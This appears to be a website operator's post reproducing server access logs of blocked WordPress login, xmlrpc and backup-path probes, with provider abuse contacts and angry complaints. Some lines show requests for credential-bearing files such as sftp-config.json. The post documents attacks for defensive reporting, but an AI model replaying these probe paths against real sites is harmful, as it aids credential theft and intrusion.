67.205.34.113website*x.com – – [27/Aug/2025:14:48:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
67.205.34.113website*x.com – – [27/Aug/2025:14:48:25 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS135951 – Webico Company Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hm-changed@vnnic.vn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.177.110.204website*x.com – – [27/Aug/2025:15:32:10 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
103.177.110.204website*x.com – – [27/Aug/2025:15:32:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS12876 – SCALEWAY S.A.S. – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@scaleway.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
62.210.185.4website*x.com – – [27/Aug/2025:16:18:38 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
62.210.185.4website*x.com – – [27/Aug/2025:16:18:38 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS46606 – Unified Layer – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
198.57.247.143website*x.com – – [27/Aug/2025:16:58:45 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
198.57.247.143website*x.com – – [27/Aug/2025:16:58:47 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

MAIL NR. 2 TODAY!

AS138521 – The Network Crew Pty Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@tnc.systems
2404:2440:cafe:c0de:f00d:177::website*x.com – – [27/Aug/2025:17:34:05 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
2404:2440:cafe:c0de:f00d:177::website*x.com – – [27/Aug/2025:17:34:06 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
35.225.92.125website*x.com – – [27/Aug/2025:18:11:09 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
35.225.92.125website*x.com – – [27/Aug/2025:18:11:09 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS8193 – „Uzbektelekom“ Joint Stock Company – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ripe@bkm.uz – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
84.54.73.81website*x.com – – [27/Aug/2025:18:17:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS270814 – ZAAZ PROVEDOR DE INTERNET E TELECOMUNICACOES – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@zaaztelecom.com.br – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
186.235.37.196website*x.com – – [27/Aug/2025:18:18:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/88.0.0.0 Safari/537.36“

MAIL NR. 3 TODAY!

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net
217.182.104.125website*x.com – – [27/Aug/2025:19:24:53 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
217.182.104.125website*x.com – – [27/Aug/2025:19:24:54 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS46606 – Unified Layer – AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.215.248.202website*x.com – – [27/Aug/2025:20:04:14 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
162.215.248.202website*x.com – – [27/Aug/2025:20:04:15 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS19871 – Network Solutions, LLC – AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
108.167.188.70website*x.com – – [27/Aug/2025:20:43:33 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
108.167.188.70website*x.com – – [27/Aug/2025:20:43:33 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS51167 – Contabo GmbH – AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.163.158.166website*x.com – – [27/Aug/2025:21:58:56 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
194.163.158.166website*x.com – – [27/Aug/2025:21:58:56 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

MAIL NR. 4 TODAY!

AS22439 – Perfect International, Inc – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
noc@perfectip.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
74.81.43.210website*x.com – – [27/Aug/2025:22:41:43 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
74.81.43.210website*x.com – – [27/Aug/2025:22:41:44 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS10200 – The Digital Lab 2007 Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
noc@ecodata.co.nz
103.238.86.80website*x.com – – [27/Aug/2025:23:28:43 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
103.238.86.80website*x.com – – [27/Aug/2025:23:28:44 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS214209 – Internet Magnate (Pty) Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
reports@magnates.co.za – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
94.156.152.52website*x.com – – [27/Aug/2025:23:44:46 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
94.156.152.52website*x.com – – [27/Aug/2025:23:44:46 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
94.156.152.52website*x.com – – [27/Aug/2025:23:44:46 +0200] „GET //doiconvs.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
94.156.152.52website*x.com – – [27/Aug/2025:23:44:46 +0200] „GET //doiconvs.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
AS265831 – SOC. COMERCIAL WIRENET CHILE LTDA – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
soporte@chilecom.net
200.63.100.137website*x.com – – [28/Aug/2025:02:06:57 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
200.63.100.137website*x.com – – [28/Aug/2025:02:06:58 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

MAIL NR. 5 TODAY!

AS36454 – WHG Hosting Services Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@worldhost.groupt – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
65.181.112.107website*x.com – – [28/Aug/2025:03:10:08 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
65.181.112.107website*x.com – – [28/Aug/2025:03:10:08 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS53850 – GorillaServers, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@GorillaServers.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
23.239.106.226website*x.com – – [28/Aug/2025:04:18:23 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
23.239.106.226website*x.com – – [28/Aug/2025:04:18:24 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS209605 – UAB Host Baltic VERY IGNORANT AND UNSECURE PROVIDER – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
91.224.92.127website*x.com – – [28/Aug/2025:05:15:31 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
91.224.92.127website*x.com – – [28/Aug/2025:05:15:46 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
91.224.92.127website*x.com – – [28/Aug/2025:05:15:47 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

MAIL NR. 6 TODAY!

NEXCESS.NET L.L.C. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nexcess.net
173.249.144.86website*x.com – – [28/Aug/2025:05:31:45 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
173.249.144.86website*x.com – – [28/Aug/2025:05:31:46 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS55720 – Gigabit Hosting Sdn Bhd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@thegigabit.com
103.205.211.78website*x.com – – [28/Aug/2025:06:23:45 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
103.205.211.78website*x.com – – [28/Aug/2025:06:23:46 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS16509 – Amazon.com, Inc. – ALWAYS STOP THIDS HACKER-IDIOTS! THIS IS VERY GOOD!
trustandsafety@support.aws.com – ALWAYS ANSWERED IN OUR ABUSE EMAILS! THIS IS VERY GOOD!
18.139.13.90website*x.com – – [28/Aug/2025:07:03:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
18.139.13.90website*x.com – – [28/Aug/2025:07:03:36 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

Nun schauen wir mal, welche Provider jetzt verantwortungsbewusst reagieren und diese dummen Hacker-Idioten stoppen!

PROTOKOLL-AUSZÜGE VOM LETZTEN WOCHENENDE, BEGINNEND AB FREITAG-Nachmittag, 22.08.25!

Sämtliche Hacker-Idioten sind mit entsprechenden MELDUNGEN an die mit verantwortlichen Provider mit aufgeführt! I.d.R geht immer eine Abuse-Meldung immer an bis zu 4 Provider, ist teilweise seh wirkungsvoll, da dadurch die Konkurrenz so mitbekommt, was bei den anderen bzgl. unsicherer Websites/Server abgeht… Haha!

Ein Absatz, immer eine Abuse-Meldung mit Email-Nr:

FREITAG NACHMITTAG 22.08.25 und SAMSTAG, 23.08.24

MAIL NR. 1 TODAY!
abuse@rusonyx.ru,biuro@atthost.pl,abuse@linode.com,ip-admin@akamai.com
LLC „ASTRA CLOUD – RUSSIA IS COMPLETE UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@rusonyx.ru,
89.253.255.122 website*x.com – – [22/Aug/2025:14:44:38 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „http://website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
AS15967 – Nazwa.pl Sp.z.o.o. – IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
biuro@atthost.pl
2a0c:5841::ac7:3159 website*x.com – – [22/Aug/2025:17:05:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
AS63949 – Akamai Connected Cloud – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@linode.com,ip-admin@akamai.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:44 +0200] „HEAD /home HTTP/1.0“ 403 – „http://www.website*x.com/home“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:44 +0200] „HEAD /backup HTTP/1.0“ 403 – „http://www.website*x.com/backup“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:44 +0200] „HEAD /bk HTTP/1.0“ 403 – „http://www.website*x.com/bk“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:45 +0200] „HEAD /new HTTP/1.0“ 403 – „http://www.website*x.com/new“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:45 +0200] „HEAD / HTTP/1.0“ 403 – „http://www.website*x.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:45 +0200] „HEAD /old HTTP/1.0“ 403 – „http://www.website*x.com/old“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:45 +0200] „HEAD /wp HTTP/1.0“ 403 – „http://www.website*x.com/wp“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:45 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „http://www.website*x.com/wordpress“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:46 +0200] „HEAD /bc HTTP/1.0“ 403 – „http://www.website*x.com/bc“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2600:3c06::2000:74ff:fee9:ff87 website*x.com – – [23/Aug/2025:01:46:46 +0200] „HEAD /main HTTP/1.0“ 403 – „http://www.website*x.com/main“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“

MAIL NR. 2 TODAY!
google-cloud-compliance@google.com, network-abuse@google.com,info@smartlink-isp.com,abuse@ptbsti.com
Google LLC – DAILY HACKER-IDIOTS! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
network-abuse@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:28 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:28 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:28 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:28 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:28 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:29 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:29 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:29 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:29 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.70.204.121 website*x.com – – [23/Aug/2025:03:49:29 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
AS210413 – Smart Link Company for Internet Service – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@smartlink-isp.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.157.54.20 website*x.com – – [23/Aug/2025:03:53:50 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.20 website*x.com – – [23/Aug/2025:03:54:31 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
AS135450 – PT Berkah Solusi Teknologi Informasi – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ptbsti.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.77.107.216 website*x.com – – [23/Aug/2025:06:45:09 +0200] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.216 website*x.com – – [23/Aug/2025:06:45:10 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“

MAIL NR. 3 TODAY!
abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,admin@serveroffer.lt
OVH GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net
51.89.8.15 www.website*x.de – – [23/Aug/2025:06:12:28 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.89.8.15 www.website*x.de – – [23/Aug/2025:06:12:28 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
AS209605 – UAB Host Baltic – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt
141.98.11.169 www.website*x.de – – [23/Aug/2025:08:16:56 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:119.0) Gecko/20100101 Firefox/119.0“
141.98.11.169 www.website*x.de – – [23/Aug/2025:08:16:56 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0“
+
91.224.92.127 www.website*x.de – – [24/Aug/2025:04:53:49 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
91.224.92.127 www.website*x.de – – [24/Aug/2025:04:53:49 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0“

MAIL NR. 4 TODAY!
google-cloud-compliance@google.com, network-abuse@google.com,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@ptbsti.com
Google LLC – DAILY HACKER-IDIOTS! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
network-abuse@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:08 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:08 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:08 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:08 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:09 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:09 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
